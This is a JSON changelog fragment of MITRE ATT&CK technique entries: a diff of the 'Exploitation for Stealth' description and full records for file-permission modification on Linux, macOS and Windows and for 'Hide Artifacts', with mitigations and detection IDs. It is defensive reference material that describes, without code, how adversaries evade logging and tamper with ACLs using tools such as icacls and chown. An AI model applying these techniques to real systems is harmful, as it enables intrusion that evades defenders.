                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to2__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to2__0\"><a href=\"#difflib_chg_to2__top\">t</a></td><td class=\"diff_header\" id=\"from2_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Adversaries&nbsp;may&nbsp;exploit&nbsp;a&nbsp;system&nbsp;or&nbsp;application&nbsp;vulnerabilit</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to2__top\">t</a></td><td class=\"diff_header\" id=\"to2_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Adversaries&nbsp;may&nbsp;exploit&nbsp;vulnerabilities&nbsp;to&nbsp;evade&nbsp;detection&nbsp;b</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">y&nbsp;to&nbsp;bypass&nbsp;security&nbsp;features.&nbsp;Exploitation&nbsp;of&nbsp;a&nbsp;vulnerabili</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">y&nbsp;hiding&nbsp;activity,&nbsp;suppressing&nbsp;logging,&nbsp;or&nbsp;operating&nbsp;within&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ty&nbsp;occurs&nbsp;when&nbsp;an&nbsp;adversary&nbsp;takes&nbsp;advantage&nbsp;of&nbsp;a&nbsp;programming</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">trusted&nbsp;or&nbsp;unmonitored&nbsp;components.&nbsp;&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;exploit</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;error&nbsp;in&nbsp;a&nbsp;program,&nbsp;service,&nbsp;or&nbsp;within&nbsp;the&nbsp;operating&nbsp;system</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;a&nbsp;system&nbsp;or&nbsp;application&nbsp;vulnerability&nbsp;to&nbsp;avoid&nbsp;detection&nbsp;wh</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;software&nbsp;or&nbsp;kernel&nbsp;itself&nbsp;to&nbsp;execute&nbsp;adversary-controlled&nbsp;c</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ile&nbsp;maintaining&nbsp;access&nbsp;within&nbsp;an&nbsp;environment.&nbsp;Exploitation&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ode.\u00a0Vulnerabilities&nbsp;may&nbsp;exist&nbsp;in&nbsp;defensive&nbsp;security&nbsp;softwar</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ccurs&nbsp;when&nbsp;an&nbsp;adversary&nbsp;leverages&nbsp;a&nbsp;programming&nbsp;flaw&nbsp;to&nbsp;exec</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;that&nbsp;can&nbsp;be&nbsp;used&nbsp;to&nbsp;disable&nbsp;or&nbsp;circumvent&nbsp;them.&nbsp;&nbsp;Adversari</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ute&nbsp;code&nbsp;in&nbsp;a&nbsp;manner&nbsp;that&nbsp;minimizes&nbsp;visibility&nbsp;or&nbsp;blends&nbsp;in&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">es&nbsp;may&nbsp;have&nbsp;prior&nbsp;knowledge&nbsp;through&nbsp;reconnaissance&nbsp;that&nbsp;secu</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">with&nbsp;legitimate&nbsp;activity.&nbsp;&nbsp;&nbsp;Rather&nbsp;than&nbsp;directly&nbsp;disabling&nbsp;d</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">rity&nbsp;software&nbsp;exists&nbsp;within&nbsp;an&nbsp;environment&nbsp;or&nbsp;they&nbsp;may&nbsp;perfo</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">efenses,&nbsp;adversaries&nbsp;may&nbsp;use&nbsp;exploitation&nbsp;to&nbsp;circumvent&nbsp;moni</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">rm&nbsp;checks&nbsp;during&nbsp;or&nbsp;shortly&nbsp;after&nbsp;the&nbsp;system&nbsp;is&nbsp;compromised&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">toring&nbsp;and&nbsp;logging&nbsp;mechanisms.&nbsp;This&nbsp;can&nbsp;include&nbsp;abusing&nbsp;vuln</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">for&nbsp;[Security&nbsp;Software&nbsp;Discovery](https://attack.mitre.org/t</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">erabilities&nbsp;in&nbsp;logging&nbsp;pipelines,&nbsp;security&nbsp;tools,&nbsp;or&nbsp;cloud&nbsp;i</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">echniques/T1518/001).&nbsp;The&nbsp;security&nbsp;software&nbsp;will&nbsp;likely&nbsp;be&nbsp;t</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nfrastructure&nbsp;to&nbsp;evade&nbsp;audit&nbsp;trails,&nbsp;suppress&nbsp;alerts,&nbsp;or&nbsp;ope</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">argeted&nbsp;directly&nbsp;for&nbsp;exploitation.&nbsp;There&nbsp;are&nbsp;examples&nbsp;of&nbsp;ant</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rate&nbsp;without&nbsp;generating&nbsp;telemetry.&nbsp;&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;identif</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ivirus&nbsp;software&nbsp;being&nbsp;targeted&nbsp;by&nbsp;persistent&nbsp;threat&nbsp;groups&nbsp;t</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">y&nbsp;these&nbsp;opportunities&nbsp;through&nbsp;prior&nbsp;reconnaissance&nbsp;or&nbsp;by&nbsp;per</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">o&nbsp;avoid&nbsp;detection.&nbsp;&nbsp;There&nbsp;have&nbsp;also&nbsp;been&nbsp;examples&nbsp;of&nbsp;vulnera</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">forming&nbsp;discovery&nbsp;of&nbsp;security&nbsp;controls&nbsp;after&nbsp;initial&nbsp;access.</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">bilities&nbsp;in&nbsp;public&nbsp;cloud&nbsp;infrastructure&nbsp;of&nbsp;SaaS&nbsp;applications</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;In&nbsp;some&nbsp;cases,&nbsp;vulnerabilities&nbsp;in&nbsp;SaaS&nbsp;or&nbsp;public&nbsp;cloud&nbsp;envi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;that&nbsp;may&nbsp;bypass&nbsp;defense&nbsp;boundaries&nbsp;(Citation:&nbsp;Salesforce&nbsp;ze</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ronments&nbsp;may&nbsp;be&nbsp;exploited&nbsp;to&nbsp;evade&nbsp;logging,&nbsp;obscure&nbsp;activity</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ro-day&nbsp;in&nbsp;facebook&nbsp;phishing&nbsp;attack),&nbsp;evade&nbsp;security&nbsp;logs&nbsp;(Ci</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">,&nbsp;or&nbsp;deploy&nbsp;infrastructure&nbsp;that&nbsp;remains&nbsp;hidden&nbsp;from&nbsp;standard</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tation:&nbsp;Bypassing&nbsp;CloudTrail&nbsp;in&nbsp;AWS&nbsp;Service&nbsp;Catalog),&nbsp;or&nbsp;dep</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;monitoring&nbsp;tools.(Citation:&nbsp;Bypassing&nbsp;CloudTrail&nbsp;in&nbsp;AWS&nbsp;Ser</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">loy&nbsp;hidden&nbsp;infrastructure.(Citation:&nbsp;GhostToken&nbsp;GCP&nbsp;flaw)</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">vice&nbsp;Catalog)(Citation:&nbsp;GhostToken&nbsp;GCP&nbsp;flaw)</span></td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1019: Threat Intelligence Program",
                            "M1048: Application Isolation and Sandboxing",
                            "M1050: Exploit Protection",
                            "M1051: Update Software"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0595: Detection Strategy for Exploitation for Stealth"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2018-10-17 00:14:20.652000+00:00",
                    "modified": "2026-04-16 20:07:53.078000+00:00",
                    "name": "File and Directory Permissions Modification",
                    "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nModifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory\u2019s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).\n\nAdversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior) ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1222",
                            "external_id": "T1222"
                        },
                        {
                            "source_name": "falconoverwatch_blackcat_attack",
                            "description": "Falcon OverWatch Team. (2022, March 23). Falcon OverWatch Threat Hunting Contributes to Seamless Protection Against Novel BlackCat Attack. Retrieved May 5, 2022.",
                            "url": "https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/"
                        },
                        {
                            "source_name": "Hybrid Analysis Icacls1 June 2018",
                            "description": "Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018.",
                            "url": "https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100"
                        },
                        {
                            "source_name": "Hybrid Analysis Icacls2 May 2018",
                            "description": "Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018.",
                            "url": "https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110"
                        },
                        {
                            "source_name": "bad_luck_blackcat",
                            "description": "Kaspersky Global Research & Analysis Team (GReAT). (2022). A Bad Luck BlackCat. Retrieved May 5, 2022.",
                            "url": "https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf"
                        },
                        {
                            "source_name": "fsutil_behavior",
                            "description": "Microsoft. (2021, September 27). fsutil behavior. Retrieved January 14, 2022.",
                            "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-behavior"
                        },
                        {
                            "source_name": "blackmatter_blackcat",
                            "description": "Pereira, T. Huey, C. (2022, March 17). From BlackMatter to BlackCat: Analyzing two attacks from one affiliate. Retrieved May 5, 2022.",
                            "url": "https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html"
                        },
                        {
                            "source_name": "new_rust_based_ransomware",
                            "description": "Symantec Threat Hunter Team. (2021, December 16). Noberus: Technical Analysis Shows Sophistication of New Rust-based Ransomware. Retrieved January 14, 2022.",
                            "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "CrowdStrike Falcon OverWatch",
                        "Jan Miller, CrowdStrike"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.078000+00:00\", \"old_value\": \"2025-10-24 17:48:52.570000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.3\"}}, \"iterable_item_removed\": {\"root['external_references'][6]\": {\"source_name\": \"EventTracker File Permissions Feb 2014\", \"description\": \"Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018.\", \"url\": \"https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/\"}}}",
                    "previous_version": "2.3",
                    "version_change": "2.3 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions",
                            "M1026: Privileged Account Management"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0299: Multi-Platform File and Directory Permissions Modification Detection Strategy"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-04 19:24:27.774000+00:00",
                    "modified": "2026-04-22 15:51:53.173000+00:00",
                    "name": "Linux and Mac Permissions",
                    "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nMost Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform\u2019s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: <code>chown</code> (short for change owner), and <code>chmod</code> (short for change mode).\n\nAdversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques) ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1222/002",
                            "external_id": "T1222.002"
                        },
                        {
                            "source_name": "Hybrid Analysis Icacls1 June 2018",
                            "description": "Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018.",
                            "url": "https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100"
                        },
                        {
                            "source_name": "Hybrid Analysis Icacls2 May 2018",
                            "description": "Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018.",
                            "url": "https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110"
                        },
                        {
                            "source_name": "20 macOS Common Tools and Techniques",
                            "description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.",
                            "url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-22 15:51:53.173000+00:00\", \"old_value\": \"2025-10-24 17:48:21.839000+00:00\"}, \"root['name']\": {\"new_value\": \"Linux and Mac Permissions\", \"old_value\": \"Linux and Mac File and Directory Permissions Modification\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions",
                            "M1026: Privileged Account Management"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0351: Unix-like File Permission Manipulation Behavioral Chain Detection Strategy"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-04 19:17:41.767000+00:00",
                    "modified": "2026-04-22 15:51:17.272000+00:00",
                    "name": "Windows Permissions",
                    "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nWindows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)\n\nAdversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1222/001",
                            "external_id": "T1222.001"
                        },
                        {
                            "source_name": "Hybrid Analysis Icacls1 June 2018",
                            "description": "Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018.",
                            "url": "https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100"
                        },
                        {
                            "source_name": "Hybrid Analysis Icacls2 May 2018",
                            "description": "Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018.",
                            "url": "https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110"
                        },
                        {
                            "source_name": "Microsoft Access Control Lists May 2018",
                            "description": "M. Satran, M. Jacobs. (2018, May 30). Access Control Lists. Retrieved February 4, 2020.",
                            "url": "https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists"
                        },
                        {
                            "source_name": "Microsoft DACL May 2018",
                            "description": "Microsoft. (2018, May 30). DACLs and ACEs. Retrieved August 19, 2018.",
                            "url": "https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-22 15:51:17.272000+00:00\", \"old_value\": \"2025-10-24 17:48:37.826000+00:00\"}, \"root['name']\": {\"new_value\": \"Windows Permissions\", \"old_value\": \"Windows File and Directory Permissions Modification\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}, \"iterable_item_removed\": {\"root['external_references'][5]\": {\"source_name\": \"EventTracker File Permissions Feb 2014\", \"description\": \"Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018.\", \"url\": \"https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions",
                            "M1026: Privileged Account Management"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0418: Windows DACL Manipulation Behavioral Chain Detection Strategy"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-26 17:41:25.933000+00:00",
                    "modified": "2026-04-15 20:17:25.231000+00:00",
                    "name": "Hide Artifacts",
                    "description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)\n\nAdversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1564",
                            "external_id": "T1564"
                        },
                        {
                            "source_name": "Cybereason OSX Pirrit",
                            "description": "Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021.",
                            "url": "https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf"
                        },
                        {
                            "source_name": "MalwareBytes ADS July 2015",
                            "description": "Arntz, P. (2015, July 22). Introduction to Alternate Data Streams. Retrieved March 21, 2018.",
                            "url": "https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/"
                        },
                        {
                            "source_name": "Sofacy Komplex Trojan",
                            "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.",
                            "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/"
                        },
                        {
                            "source_name": "Sophos Ragnar May 2020",
                            "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020.",
                            "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/"
                        }
                    ],
